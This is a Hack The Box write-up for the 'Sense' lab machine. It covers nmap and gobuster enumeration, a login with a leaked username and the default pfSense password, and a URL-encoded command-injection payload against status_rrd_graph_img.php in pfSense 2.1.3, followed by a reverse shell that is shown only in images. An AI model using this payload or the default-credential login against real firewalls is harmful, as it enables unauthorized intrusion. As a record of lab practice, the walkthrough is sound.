Skip to main content

HTB - Sense

alt

Basic Nmap scan

Nmap Command: nmap -Pn -n -sC -sV -oA scan_boxs/sense/nmap/10.10.10.60-d-scan 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.15s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time

Open ports : 80,443

PORTSERVICEPRODUCTVERSIONEXTRAINFO
80httplighttpd1.4.35
443httplighttpd1.4.35

port 80,443

Accessing ip 10.10.10.60 on port 80 is redirected to 443.

alt

gobuster discovers some folders and pages.

https://10.10.10.60:443/index.html           (Status: 200) [Size: 329]
https://10.10.10.60:443/help.php (Status: 200) [Size: 6689]
https://10.10.10.60:443/index.php (Status: 200) [Size: 6690]
https://10.10.10.60:443/themes (Status: 301) [Size: 0] [--> https://10.10.10.60:443/themes/]
https://10.10.10.60:443/stats.php (Status: 200) [Size: 6690]
https://10.10.10.60:443/css (Status: 301) [Size: 0] [--> https://10.10.10.60:443/css/]
https://10.10.10.60:443/edit.php (Status: 200) [Size: 6689]
https://10.10.10.60:443/includes (Status: 301) [Size: 0] [--> https://10.10.10.60:443/includes/]
https://10.10.10.60:443/system.php (Status: 200) [Size: 6691]
https://10.10.10.60:443/license.php (Status: 200) [Size: 6692]
https://10.10.10.60:443/status.php (Status: 200) [Size: 6691]
https://10.10.10.60:443/javascript (Status: 301) [Size: 0] [--> https://10.10.10.60:443/javascript/]
https://10.10.10.60:443/changelog.txt (Status: 200) [Size: 271]
https://10.10.10.60:443/classes (Status: 301) [Size: 0] [--> https://10.10.10.60:443/classes/]
https://10.10.10.60:443/exec.php (Status: 200) [Size: 6689]
https://10.10.10.60:443/widgets (Status: 301) [Size: 0] [--> https://10.10.10.60:443/widgets/]
https://10.10.10.60:443/graph.php (Status: 200) [Size: 6690]
https://10.10.10.60:443/tree (Status: 301) [Size: 0] [--> https://10.10.10.60:443/tree/]
https://10.10.10.60:443/wizard.php (Status: 200) [Size: 6691]
https://10.10.10.60:443/shortcuts (Status: 301) [Size: 0] [--> https://10.10.10.60:443/shortcuts/]
https://10.10.10.60:443/pkg.php (Status: 200) [Size: 6688]
https://10.10.10.60:443/installer (Status: 301) [Size: 0] [--> https://10.10.10.60:443/installer/]
https://10.10.10.60:443/wizards (Status: 301) [Size: 0] [--> https://10.10.10.60:443/wizards/]
https://10.10.10.60:443/xmlrpc.php (Status: 200) [Size: 384]
https://10.10.10.60:443/reboot.php (Status: 200) [Size: 6691]
https://10.10.10.60:443/interfaces.php (Status: 200) [Size: 6695]
https://10.10.10.60:443/csrf (Status: 301) [Size: 0] [--> https://10.10.10.60:443/csrf/]
https://10.10.10.60:443/system-users.txt (Status: 200) [Size: 106]
https://10.10.10.60:443/filebrowser (Status: 301) [Size: 0] [--> https://10.10.10.60:443/filebrowser/]
https://10.10.10.60:443/%7Echeckout%7E (Status: 403) [Size: 345]

We find and interesting page which reveals user information on https://10.10.10.60:443/system-users.txt

alt

found a user rohit and we try the default password pfsense on the login page and we were succefully login.
https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
alt

alt

System Information:
Name: pfsense.localdomain
version: 2.1.3-Release

Exploit: command injection

This version is vulnerable to command injection.
https://packetstormsecurity.com/files/145575/pfSense-2.1.3-RELEASE-amd64-Remote-Command-Execution.html

alt

vulnerable details: https://www.proteansec.com/linux/pfsense-vulnerabilities-part-2-command-injection/

Command Injection in status_rrd_graph_img.php

alt

Accessing RRD Graphs.
alt

Testing command injection https://10.10.10.60/status_rrd_graph_img.php?database=queues%3bcd%20..%3bcd%20..%3bcd%20..%3bcd%20usr%3bcd%20local%3bcd%20www%3becho%20%27test%20the%20inject%27%3Ehelloq.txt

alt

This command injection will create a hello.txt
alt

Reverse shell and flags

This creates a php file inject.php and we can run shell command
alt

Injecting reverse shell
alt

alt